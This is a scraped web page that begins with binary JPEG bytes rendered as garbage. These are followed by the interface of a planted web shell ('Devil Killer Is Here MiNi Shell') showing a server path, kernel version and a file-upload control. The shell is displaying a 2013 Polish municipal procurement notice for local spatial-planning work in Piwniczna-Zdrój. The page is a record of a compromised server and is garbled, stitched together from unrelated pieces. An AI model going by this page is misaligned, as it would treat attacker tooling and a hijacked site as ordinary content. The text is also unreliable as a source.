JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/136177-N-2013.html

<p class="kh_header"><b>Piwniczna-Zdrój: Opracowanie projektów zmian miejscowych planów zagospodarowania przestrzennego dla Miasta i Gminy Piwniczna-Zdrój - obszar miasta Piwniczna-Zdrój oraz wsi Łomnica-Zdrój</b><br>
<b>Numer ogłoszenia: 136177 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Piwniczna-Zdrój , ul. Rynek 20, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 0-18 4464043, faks 0-18 4464186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piwniczna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów zmian miejscowych planów zagospodarowania przestrzennego dla Miasta i Gminy Piwniczna-Zdrój - obszar miasta Piwniczna-Zdrój oraz wsi Łomnica-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przygotowanie i opracowanie projektów zmian miejscowych planów zagospodarowania przestrzennego, wykonanie prognoz oddziaływania w)w zmian planów na środowisko, opracowanie prognoz skutków finansowych uchwalenia zmian miejscowych planów zagospodarowania przestrzennego z uwzględnieniem postanowień ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tj. Dz. U. z 2012 r. poz. 647 z późn. zm.), przygotowanie wniosków o wyłączenie gruntów z użytkowania leśnego i rolniczego zgodnie z wymogami ustawy z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz. U. z 2004 r., Nr 121, poz. 1266, z późn. zm.) wraz z niezbędnymi opiniami, udział we wszelkich czynnościach związanych ze sporządzeniem projektu planu, wykonanie innych materiałów planistycznych i dokumentacji prac planistycznych określonych w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego ( Dz. U. z 2003 r., Nr 164, poz. 1587 ).

2.Tereny objęte zmianą MPZP obejmują ok. 50 ha.
3.Tereny objęte zmianą znajdują się m.in.:
-w obszarze Natura 2000, 
-na obszarze parku krajobrazowego, 
-w obszarze stref uzdrowiskowych,
-w obszarze i terenie górniczym,
-w strefie nadgranicznej.
4.Powyższe opracowania należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami prawnymi, a w szczególności:
.ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tj. Dz. U. z 2012 r. poz. 647 z późn. zm.),
.ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r., Nr 199, poz. 1227 z późn. zm.),
.rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r., Nr 164, poz. 1587 ),
.przepisami szczególnymi dotyczącymi ochrony środowiska, przyrody, zabytków, prawa wodnego, ochrony gruntów rolnych i leśnych itd.

5.Obszar opracowania projektów zmian miejscowych planów zagospodarowania przestrzennego został szczegółowo określony w załącznikach do uchwał nr: 
-XVI)102)12 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 stycznia 2012 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Miasta i Gminy Piwniczna-Zdrój - Jednostka strukturalna D Łomnica-Zdrój,
- XXIII)137)12 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 września 2012 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Miasta i Gminy Piwniczna-Zdrój - Jednostka strukturalna A.I Miasto,
- XXIII)138)12 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 września 2012 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Miasta i Gminy Piwniczna-Zdrój - Jednostka strukturalna A.IV Kosarzyska,
-XXIII)139)12 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 września 2012 r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Miasta i Gminy Piwniczna-Zdrój - Jednostka strukturalna A.III Hanuszów-Zagrody,
-XXIII)140)12 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 września 2012 w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Miasta i Gminy Piwniczna-Zdrój - Jednostka strukturalna  A.II Zawodzie,
- XXX)196)13 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 marca 2013 r. w sprawie zmiany uchwały,
-XXX)197)13 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 marca 2013 r. w sprawie zmiany uchwały,
-XXX)198)13 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 marca 2013 r. w sprawie zmiany uchwały,
-XXX)199)13 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 marca 2013 r. w sprawie zmiany uchwały,
-XXX)200)13 Rady Miasta i Gminy Piwniczna-Zdrój z dnia 27 marca 2013 r. w sprawie zmiany uchwały,
Zakres opracowania projektów zmian miejscowych planów zagospodarowania przestrzennego musi odpowiadać wymogom ustawy o planowaniu i zagospodarowaniu przestrzennym oraz wymogom rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego
Zakres opracowania:
1.Wykonanie projektów zmian miejscowych planów zagospodarowania przestrzennego (dalej MPZP).
2.Opracowanie prognozy oddziaływania na środowisko dla projektów zmian MPZP.
3.Sporządzenie prognozy skutków finansowych uchwalenia MPZP.
4.Przedłożenie projektów zmian MPZP Komisji Urbanistyczno-Architektonicznej do zaopiniowania oraz wprowadzenie ewentualnych zmian.
5.Uzyskanie opinii i uzgodnień do projektów zmian MPZP.
6.Wprowadzenie zmian do projektów MPZP wynikających z uzyskanych opinii i uzgodnień.
7.Wyłożenie projektów zmian MPZP do publicznego wglądu i przeprowadzenie dyskusji publicznej nad rozwiązaniami przyjętymi w projektach zmian MPZP.
8.Przygotowanie propozycji rozstrzygnięcia uwag złożonych do projektów zmian MPZP.
9.Wprowadzenie zmian do projektów MPZP wynikających z rozpatrzenia uwag na etapie wyłożenia do publicznego wglądu.
10.Powtórzenie procedury w niezbędnym zakresie.
11.Przedstawienie projektów zmian MPZP do uchwalenia.
12.Skompletowanie dokumentacji prac planistycznych.
13.Przygotowanie projektów zmian MPZP wraz z dokumentacją prac planistycznych do przedstawienia Wojewodzie Małopolskiemu celem publikacji w dzienniku urzędowym województwa.
14.Zakończenie następuje po pozytywnej ocenie przez wojewodę uchwał wraz z załącznikami i dokumentacją planistyczną w zakresie zgodności z przepisami prawa.
Obowiązki Wykonawcy obejmują:
W ramach realizacji zlecenia Wykonawca zapewnia:
1.Przygotowanie ogłoszenia oraz obwieszczenia o przystąpieniu do sporządzenia zmian MPZP.
2. Ewentualne powtórzenie części procedury w niezbędnym zakresie.
3.Przygotowanie pism wraz z projektami zmian MPZP do opiniowania i uzgodnień z właściwymi organami; obejmuje to edycję zawiadomień, zaadresowanie kopert i potwierdzeń odbioru z powielaniem projektów planów w niezbędnej ilości egzemplarzy.
4.Przygotowanie ogłoszeń i obwieszczeń o terminie wyłożenia projektów zmian MPZP planu do publicznego wglądu.
5.Obsługa wyłożenia projektu zmiany planów do publicznego wglądu (wymagany udział głównego projektanta).
6.Zorganizowanie w okresie wyłożenia dyskusji publicznej nad przyjętymi w projektach zmian MPZP rozwiązaniami i sporządzenie protokółu z przeprowadzenia dyskusji.
7.Przygotowanie projektu uchwały Rady Miasta i Gminy wraz z listą nieuwzględnionych uwag z propozycją uzasadnień ich rozstrzygnięcia w czasie gwarantującym Burmistrzowi Piwnicznej-Zdroju ich rozpatrzenie z zachowaniem ustawowego terminu,
8.Przygotowanie ostatecznej wersji projektów uchwał do uchwalenia.
Ponadto główny projektant zmian MPZP - urbanista, zobowiązany jest do udziału i prezentacji (w zależności od potrzeb):
-na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej,
-na posiedzeniach komisji Rady Miasta i Gminy Piwniczna-Zdrój,
-na sesji Rady Miasta i Gminy Piwniczna-Zdrój, dotyczącej uchwalenia projektów zmian MPZP,
-w uzgodnieniach i innych czynnościach procedury planistycznej.
Wykonawca odpowiada za prawidłowość i zgodność z prawem procedury planistycznej.
Forma ostateczna.
Projekt planu powinien obejmować:
a)rysunek planu na CD lub DVD w formacie JPG i PDF,
b)projekty ustaleń MPZP w formie uchwały Rady Miasta i Gminy Piwniczna-Zdrój w pełnej problematyce,
c) prognozę skutków finansowych uchwalenia zmian MPZP,
d) prognozę oddziaływania na środowisko,
e) rysunek planu w grafice barwnej w skali 1 : 2000, w czytelnej grafice umożliwiającej identyfikację  własności,
f)załączniki zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 26.08.2003 r. w sprawie wymaganego zakresu projektu m.p.z.p.
Projekty zmian MPZP oraz prognoza winny być sporządzone oraz zawierać elementy określone w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisach prawa. Całość tekstu i tabel należy załączyć w formie elektronicznej w formacie Microsoft Word.
Opracowanie należy wykonać w postaci umożliwiającej odrębne uchwalenie zmian dla poszczególnych MPZP (4 plany obejmujące obszar miejski Piwnicznej-Zdrój, 1 plan dla wsi Łomnica-Zdrój) wraz z odrębnymi kompletami dokumentacji niezbędnej do przeprowadzenia procedur planistycznych oraz do końcowej oceny zgodności z prawem i publikacji każdego z uchwalonych planów w Dzienniku Urzędowym Województwa Małopolskiego.
W formie wydruku, dla każdego planu osobno (4 plany obejmujące obszar miejski Piwnicznej-Zdrój, 1 plan dla wsi Łomnica-Zdrój) należy przedstawić:
-tekst uchwalonej zmiany planu 3 egz.
-rysunki uchwalonej zmiany planu 3 egz. wydruk w grafice barwnej w skali 1 : 2000  
W formie elektronicznej dla każdego planu osobno należy przedstawić:
3 egzemplarze z rysunkiem planu w kolorze w skali 1 : 2000 na nośniku CD lub DVD, w tym: pliki tekstowe w formatach: doc, PDF; pliki graficzne w formatach: JPG, PDF, o rozdzielczości minimum 300 DPI, pliki powinny umożliwiać ponowny wydruk map bez udziału wykonawcy.
Materiały dostarczane przez Zamawiającego:
.kopie uchwał o przystąpieniu do zmiany MPZP,
.kopie miejscowych planów zagospodarowania przestrzennego obowiązujących na terenach opracowań,
.kopia obowiązującego Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Piwniczna-Zdrój,
.Ekofizjografia (zamawiający dysponuje opracowaniami z 2005 r.),
.Wnioski do miejscowych planów zagospodarowania przestrzennego.
Zamawiający zobowiązuje się do poniesienia kosztów związanych z:
-wysyłką korespondencji,
-opiniowaniem projektów zmian MPZP przez gminną komisję urbanistyczno-architektoniczną,
-publikacjami w prasie.
 Kody Wspólnego Słownika Zamówień:
71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne 
71200000-0 - Usługi architektoniczne i podobne
71300000-1 - Usługi inżynieryjne
71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego zagospodarowania   terenu
71410000-5 - Usługi planowania przestrzennego
71420000-8 - Architektoniczne usługi zagospodarowania terenu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.30.00.00-1, 71.40.00.00-2, 71.41.00.00-5, 71.42.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 2500,00 słownie: dwa tysiące pięćset  złotych 00)100 
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w piwnicznej-zdroju  BS Piwniczna    62 8813 0004 2001 0000 7100 0001  z adnotacją wadium - Opracowanie projektów zmian miejscowych planów zagospodarowania przestrzennego dla Miasta i Gminy Piwniczna-Zdrój - obszar miasta Piwniczna-Zdrój oraz wsi Łomnica-Zdrój 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.) w terminie 2013-07-23, sposób przekazania: oryginał dołączony do oferty
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
 BS Piwniczna   62 8813 0004 2001 0000 7100 0001  z adnotacją wadium - Opracowanie projektów zmian miejscowych planów zagospodarowania przestrzennego dla Miasta i Gminy Piwniczna-Zdrój - obszar miasta Piwniczna-Zdrój oraz wsi Łomnica-Zdrój 
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi  z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem   z ofertą w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta ) poręczyciela.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu spełniania warunku:

Wykonawca  musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 

Zrealizował z należytą starannością co najmniej 2  studium/ lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego/ lub planów  zagospodarowania przestrzennego /lub planów zmian zagospodarowania przestrzennego   dla miasta /  gminy / gminy miejsko-wiejskiej o powierzchni opracowania każdego z nich minimum 30 ha. 
Przez realizację planu Zamawiający rozumie opublikowanie uchwały w Dzienniku Urzędowym województwa.
W przypadku podmiotów działających wspólnie warunek posiadania wiedzy i doświadczenia podlega sumowaniu.


Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu:
 wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz                 z podaniem ich wartości, przedmiotu, dat wykonania  i podmiotów, na rzecz których usługi zostały wykonane (wg wzoru Zamawiającego - załącznik nr 4   do SIWZ) oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.


Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia, na podstawie złożenia w ofercie  wykazu osób które potwierdza, że wykonawca dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował :
 a) minimum jedną osobą pełnącą funkcję głównego  projektanta  (osoba kierująca pracą zespołu) posiadającą  odpowiednie doświadczenie  tj. brała udział w opracowaniu  co najmniej dwóch projektów; studium) lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego) lub planów zagospodarowania przestrzennego )lub planów zmian zagospodarowania przestrzennego   dla miasta )  gminy ) gminy miejsko-wiejskiej uchwalonych i obowiązujących . 
b) minimum jedną  osobą, która będzie wykonywać prognozę oddziaływania na środowisko                    i posiada doświadczenie, tj. brała udział w opracowaniu co najmniej jednej prognozy oddziaływania  na środowisko dla studium) lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego) lub planu zagospodarowania przestrzennego )lub planu zmian zagospodarowania przestrzennego   dla miasta )  gminy ) gminy miejsko-wiejskiej
c) minium jedną osobę która będzie wykonywać prognozę skutków finansowych  i posiada doświadczenie, tj. brała udział w opracowaniu co najmniej jednej prognozy oddziaływania  na środowisko dla studium) lub zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego) lub planu zagospodarowania przestrzennego )lub planu zmian zagospodarowania przestrzennego   dla miasta )  gminy ) gminy miejsko-wiejskiej.

Dokumenty i oświadczenia potwierdzające spełnianie warunkow udziału w postępowaniu:  
wykaz  osób dostępnych wykonawcy usług w celu wykonania zamowienia  wg wzoru Zamawiającego - załącznik do 5 SIWZ).

Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia, na podstawie złożenia w ofercie  wykazu osób które potwierdza, że wykonawca dysponuje lub będzie dysponował osobami zdolnymi do wykoanaia zamóweinia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę posiadanie ubezpieczenia od odpowiedzialnosci cywilnej  w zakresie prowadzonej działalności na kwotę nie mniejszą niż       100 000,00 zł  

Dokumenty i oświadczenia potwierdzające spełnianie warunkow udziału w postępowaniu:  
opłacona polisa , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                           z przedmiotem zamówienia. 

Zamawiający dokona oceny spełnienia warunku wg formuły spełnia - nie spełnia, na podstawie złożenia w ofercie opłaconej  polsy lub innego dokumentu potwierdzajcego że Wykonawca jest ubezpieczony od odpowiedzialności cywiej w zakresie prowadzonej dzialalności związanej     z przedmiotem zmówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

